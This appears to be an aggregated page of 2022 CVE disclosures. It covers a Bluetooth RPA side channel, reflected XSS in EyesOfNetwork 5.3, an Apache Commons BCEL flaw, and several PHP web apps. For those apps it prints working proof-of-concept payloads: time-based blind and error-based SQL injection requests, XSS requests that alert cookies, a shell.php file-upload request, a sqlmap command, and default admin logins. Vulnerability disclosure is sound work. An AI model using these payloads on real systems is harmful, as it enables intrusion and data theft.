An information leakage vulnerability in the Bluetooth Low Energy advertisement scan response in Bluetooth Core Specifications 4.0 through 5.2, and extended scan response in Bluetooth Core Specifications 5.0 through 5.2, may be used to identify devices using Resolvable Private Addressing (RPA) by their response or non-response to specific scan requests from remote addresses. RPAs that have been associated with a specific remote device may also be used to identify a peer in the same manner by using its reaction to an active scan request. This has also been called an allowlist-based side channel.

CVE-2020-35473: ACM CCS 2022

EyesOfNetwork Web Interface v5.3 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /module/admin_bp/add_application.php.

CVE-2022-XXXXX

\------------------------------------------

\[Suggested description\]

EyesOfNetwork web interface 5.3 allows admins to conduct reflected XSS attacks.

\------------------------------------------

\[Vulnerability Type\]

Cross Site Scripting (XSS)

\------------------------------------------

\[Vendor of Product\]

EyesOfNetwork

\------------------------------------------

\[Affected Product Code Base\]

EyesOfNetwork web interface 5.3

\------------------------------------------

\[Affected Component\]

We found reflected xss at /module/admin\_bp/add\_application.php

\------------------------------------------

\[Attack Type\]

Remote

\------------------------------------------

\[Attack Vectors\]

https://github.com/EyesOfNetworkCommunity/eonweb/issues/118

The vulnerable parameter is GET-parameter bp\_name.

\------------------------------------------

\[Reference\]

EyesOfNetwork web interface 5.3 (https://github.com/EyesOfNetworkCommunity/eonweb)

\------------------------------------------

\[Discoverer\]

Yuriy Bairov, Dmitriy Tatarov

CVE-2022-41433: gist:b7419cab29f4105df1c1fbe5d99edd7c

EyesOfNetwork Web Interface v5.3 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /module/report_event/index.php.

CVE-2022-XXXXX

\------------------------------------------

\[Suggested description\]

EyesOfNetwork web interface 5.3 allows admins to conduct reflected XSS attacks.

\------------------------------------------

\[Vulnerability Type\]

Cross Site Scripting (XSS)

\------------------------------------------

\[Vendor of Product\]

EyesOfNetwork

\------------------------------------------

\[Affected Product Code Base\]

EyesOfNetwork web interface 5.3

\------------------------------------------

\[Affected Component\]

We found reflected xss at /module/report\_event/index.php

\------------------------------------------

\[Attack Type\]

Remote

\------------------------------------------

\[Attack Vectors\]

https://github.com/EyesOfNetworkCommunity/eonweb/issues/119

The vulnerable parameter is GET-parameter type.

\------------------------------------------

\[Reference\]

EyesOfNetwork web interface 5.3 (https://github.com/EyesOfNetworkCommunity/eonweb)

\------------------------------------------

\[Discoverer\]

Yuriy Bairov, Dmitriy Tatarov

CVE-2022-41432: gist:bda0b16cf99cb14bb767db84e5110419

EyesOfNetwork Web Interface v5.3 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /lilac/main.php.

CVE-2022-XXXXX

\------------------------------------------

\[Suggested description\]

EyesOfNetwork web interface 5.3 allows to conduct reflected XSS attacks.

\------------------------------------------

\[Vulnerability Type\]

Cross Site Scripting (XSS)

\------------------------------------------

\[Vendor of Product\]

EyesOfNetwork

\------------------------------------------

\[Affected Product Code Base\]

EyesOfNetwork web interface 5.3

\------------------------------------------

\[Affected Component\]

We found reflected xss at /lilac/main.php

\------------------------------------------

\[Attack Type\]

Remote

\------------------------------------------

\[Attack Vectors\]

https://github.com/EyesOfNetworkCommunity/eonweb/issues/117

\------------------------------------------

\[Reference\]

EyesOfNetwork web interface 5.3 (https://github.com/EyesOfNetworkCommunity/eonweb)

\------------------------------------------

\[Discoverer\]

Yuriy Bairov, Dmitriy Tatarov

CVE-2022-41434: gist:83553302a1960311c8c4c8cc4a974577

Canteen Management System Project v1.0 was discovered to contain a SQL injection vulnerability via the component /youthappam/add-food.php.

**Canteen Management System Project v1.0 by mayuri\_k has SQL injection**

BUG\_Author: YorkLee

Login account: mayuri.infospace@gmail.com/rootadmin

vendors:https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

Vulnerability File: /youthappam/add-food.php

Vulnerability location: /youthappam/add-food.php POST form exists time-based blind injection vulnerability

**Payload1:**

    ------WebKitFormBoundarywm9jYBqgKtHi9E5z
    Content-Disposition: form-data; name="productName"
    
    123' AND (SELECT 5842 FROM (SELECT(SLEEP(5)))JKeV) AND 'jYhF'='jYhF
    ------WebKitFormBoundarywm9jYBqgKtHi9E5z
    Content-Disposition: form-data; name="quantity"
    
    123
    ------WebKitFormBoundarywm9jYBqgKtHi9E5z
    Content-Disposition: form-data; name="rate"
    
    123
    ------WebKitFormBoundarywm9jYBqgKtHi9E5z
    Content-Disposition: form-data; name="categoryName"
    
    1
    ------WebKitFormBoundarywm9jYBqgKtHi9E5z
    Content-Disposition: form-data; name="productStatus"
    
    1
    ------WebKitFormBoundarywm9jYBqgKtHi9E5z
    Content-Disposition: form-data; name="create"
    
    
    ------WebKitFormBoundarywm9jYBqgKtHi9E5z--
    

**note: the field "------WebKitFormBoundarywm9jYBqgKtHi9E5z" is from Content-Type that in http-header**

SELECT(SLEEP(5)) The server response time is 5 seconds

**Payload2:**

    ------WebKitFormBoundarywm9jYBqgKtHi9E5z
    Content-Disposition: form-data; name="productName"
    
    123' AND (SELECT 5842 FROM (SELECT(SLEEP(10)))JKeV) AND 'jYhF'='jYhF
    ------WebKitFormBoundarywm9jYBqgKtHi9E5z
    Content-Disposition: form-data; name="quantity"
    
    123
    ------WebKitFormBoundarywm9jYBqgKtHi9E5z
    Content-Disposition: form-data; name="rate"
    
    123
    ------WebKitFormBoundarywm9jYBqgKtHi9E5z
    Content-Disposition: form-data; name="categoryName"
    
    1
    ------WebKitFormBoundarywm9jYBqgKtHi9E5z
    Content-Disposition: form-data; name="productStatus"
    
    1
    ------WebKitFormBoundarywm9jYBqgKtHi9E5z
    Content-Disposition: form-data; name="create"
    
    
    ------WebKitFormBoundarywm9jYBqgKtHi9E5z--
    

**note: the field "------WebKitFormBoundarywm9jYBqgKtHi9E5z" is from Content-Type that in http-header**

SELECT(SLEEP(10)) The server response time is 10 seconds

**Payload3:**

    ------WebKitFormBoundarywm9jYBqgKtHi9E5z
    Content-Disposition: form-data; name="productName"
    
    123' AND (SELECT 5842 FROM (SELECT(SLEEP(15)))JKeV) AND 'jYhF'='jYhF
    ------WebKitFormBoundarywm9jYBqgKtHi9E5z
    Content-Disposition: form-data; name="quantity"
    
    123
    ------WebKitFormBoundarywm9jYBqgKtHi9E5z
    Content-Disposition: form-data; name="rate"
    
    123
    ------WebKitFormBoundarywm9jYBqgKtHi9E5z
    Content-Disposition: form-data; name="categoryName"
    
    1
    ------WebKitFormBoundarywm9jYBqgKtHi9E5z
    Content-Disposition: form-data; name="productStatus"
    
    1
    ------WebKitFormBoundarywm9jYBqgKtHi9E5z
    Content-Disposition: form-data; name="create"
    
    
    ------WebKitFormBoundarywm9jYBqgKtHi9E5z--
    

**note: the field "------WebKitFormBoundarywm9jYBqgKtHi9E5z" is from Content-Type that in http-header**

SELECT(SLEEP(15)) The server response time is 15 seconds

**Payload4:**

Store the post message in a file, and further disclose the database information through sqlmap.

sqlmap cmd: python .\sqlmap.py -r .\header.txt --tamper=space2comment --risk 3 -current-db

results:

CVE-2022-43049: bug_report_canteen/SQLi.md at master · sdpyly/bug_report_canteen

Food Ordering Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /foms/place-order.php.

Permalink

**Food Ordering Management System v1.0 by oretnom23 has Cross-site scripting (reflected)**

BUG\_Author: Oudaorui

Login account: admin/admin123 (Super Admin account)

vendors:https://www.sourcecodester.com/php/15689/food-ordering-management-system-php-and-mysql-free-source-code.html

Vulnerability File: /foms/place-order.php

#POC：

    POST /foms/place-order.php HTTP/1.1
    Host: localhost
    Origin: http://localhost
    Cookie: PHPSESSID=q8rk2e0ji131erjfddf8dtu1hf
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Upgrade-Insecure-Requests: 1
    Referer: http://localhost/foms/index.php
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Content-Length: 85
    
    1=0rev13%22%3e%3cscript%3ealert('xss')%3c%2fscript%3et4kbj&2=0&description=777596&action=
    

#POC：

    POST /foms/place-order.php HTTP/1.1
    Host: localhost
    Origin: http://localhost
    Cookie: PHPSESSID=q8rk2e0ji131erjfddf8dtu1hf
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Upgrade-Insecure-Requests: 1
    Referer: http://localhost/foms/index.php
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Content-Length: 99
    
    1=0rev13%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3et4kbj&2=0&description=777596&action=

CVE-2022-43046: bug_report/XSS-1.md at main · Oudaorui/bug_report

Online Tours & Travels Management System v1.0 was discovered to contain an arbitrary file upload vulnerability in the component update_profile.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

Permalink

**Online Tours & Travels Management System v1.0 by mayuri\_k has arbitrary code execution (RCE)**

BUG\_Author: Dig-Bick

vendors: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

Vulnerability url: ip/tour/admin/operations/admin.php?id=2

Loophole location: Online Tours & Travels management system's update\_profile.php file exists arbitrary file upload (RCE)

Request package for file upload：

POST /tour/admin/operations/admin.php?id\=2 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/tour/admin/update\_profile.php
Cookie: PHPSESSID=g29omi7f91g3h7ud1uhq6rbmkv
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------27994107238879
Content-Length: 856
\-----------------------------27994107238879
Content-Disposition: form-data; name="fname"
Mayuri
\-----------------------------27994107238879
Content-Disposition: form-data; name="lname"
K
\-----------------------------27994107238879
Content-Disposition: form-data; name="email"
mayuri.infospace@gmail.com
\-----------------------------27994107238879
Content-Disposition: form-data; name="contact"
+919405716239
\-----------------------------27994107238879
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------27994107238879
Content-Disposition: form-data; name="old\_img"
133.jpeg
\-----------------------------27994107238879
Content-Disposition: form-data; name="update"
\-----------------------------27994107238879--

The files will be uploaded to this directory \\tour\\admin\\upload

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-43050: bug_report/RCE-1.md at main · 1909900436/bug_report

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /odlms/classes/Users.php?f=delete_test.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Dig-Bick

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/classes/Users.php?f=delete\_test

Vulnerability location: /odlms/classes/Users.php?f=delete\_test,id

dbname=odlms\_db,length=8

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /odlms/classes/Users.php?f\=delete\_test HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/odlms/admin/?page=appointments
Content-Length: 66
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close
id=1'  and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-43051: bug_report/SQLi-1.md at main · 1909900436/bug_report

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /odlms/classes/Users.php?f=delete.

**Online Diagnostic Lab Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Dig-Bick

Login account: admin/admin123 (Super Admin account)

Login account: cblake@sample.com/cblake123 (General account)

vendors: https://www.sourcecodester.com/php/15129/online-diagnostic-lab-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /odlms/classes/Users.php?f=delete

Vulnerability location: /odlms/classes/Users.php?f=delete,id

dbname=odlms\_db,length=8

\[+\] Payload: id=6' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /odlms/classes/Users.php?f\=delete HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/odlms/admin/?page=appointments
Content-Length: 66
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close
id=6'  and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-43052: bug_report/SQLi-2.md at main · 1909900436/bug_report

Apache Commons BCEL has a number of APIs that would normally only allow changing specific class characteristics. However, due to an out-of-bounds writing issue, these APIs can be used to produce arbitrary bytecode. This could be abused in applications that pass attacker-controllable data to those APIs, giving the attacker more control over the resulting bytecode than otherwise expected. Update to Apache Commons BCEL 6.6.0.

**Apache Commons BCEL vulnerable to out-of-bounds write**

High severity GitHub Reviewed Published Nov 7, 2022 • Updated Nov 7, 2022

Tag

#php